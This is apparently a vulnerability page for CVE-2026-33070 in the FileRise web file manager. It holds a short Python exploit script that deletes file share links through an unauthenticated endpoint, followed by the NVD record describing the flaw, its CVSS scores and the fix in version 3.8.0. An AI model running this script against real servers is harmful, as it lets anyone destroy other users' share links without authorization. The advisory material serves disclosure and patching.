CVE-2026-33070

import requests def delete_share_link(target_url, share_token): """ Exploit for CVE-2026-33070 Deletes a share link without authentication. """ # The vulnerable endpoint endpoint = f"{target_url}/api/file/deleteShareLink.php" # Payload containing the share token payload = { "token": share_token } try: response = requests.post(endpoint, data=payload) if response.status_code == 200: print(f"[+] Successfully deleted share link with token: {share_token}") else: print(f"[-] Failed. Status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Example usage target = "http://localhost" token = "example_share_token_123" delete_share_link(target, token)

{"cve": {"id": "CVE-2026-33070", "sourceIdentifier": "[email protected]", "published": "2026-03-20T09:16:15.347", "lastModified": "2026-03-23T15:33:39.733", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FileRise is a self-hosted web file manager / WebDAV server. In versions prior to 3.8.0, a missing-authentication vulnerability in the deleteShareLink endpoint allows any unauthenticated user to delete arbitrary file share links by providing only the share token, causing denial of service to shared file access. The POST /api/file/deleteShareLink.php endpoint calls FileController::deleteShareLink() which performs no authentication, authorization, or CSRF validation before deleting a share link. Any anonymous HTTP client can destroy share links. This issue is fixed in version 3.8.0."}, {"lang": "es", "value": "FileRise es un gestor de archivos web / servidor WebDAV autoalojado. En versiones anteriores a la 3.8.0, una vulnerabilidad de autenticación faltante en el endpoint deleteShareLink permite a cualquier usuario no autenticado eliminar enlaces de archivos compartidos arbitrarios proporcionando solo el token de compartición, causando denegación de servicio al acceso a archivos compartidos. El endpoint POST /api/file/deleteShareLink.php llama a FileController::deleteShareLink() que no realiza ninguna autenticación, autorización o validación CSRF antes de eliminar un enlace de compartición. Cualquier cliente HTTP anónimo puede destruir enlaces de compartición. Este problema está solucionado en la versión 3.8.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:filerise:filerise:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.8.0", "matchCriteriaId": "144B6CF3-5C73-4B67-B8A1-154550DFEFBA"}]}]}], "references": [{"url": "https://github.com/error311/FileRise/releases/tag/v3.8.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/error311/FileRise/security/advisories/GHSA-vh5m-w36c-99xv", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}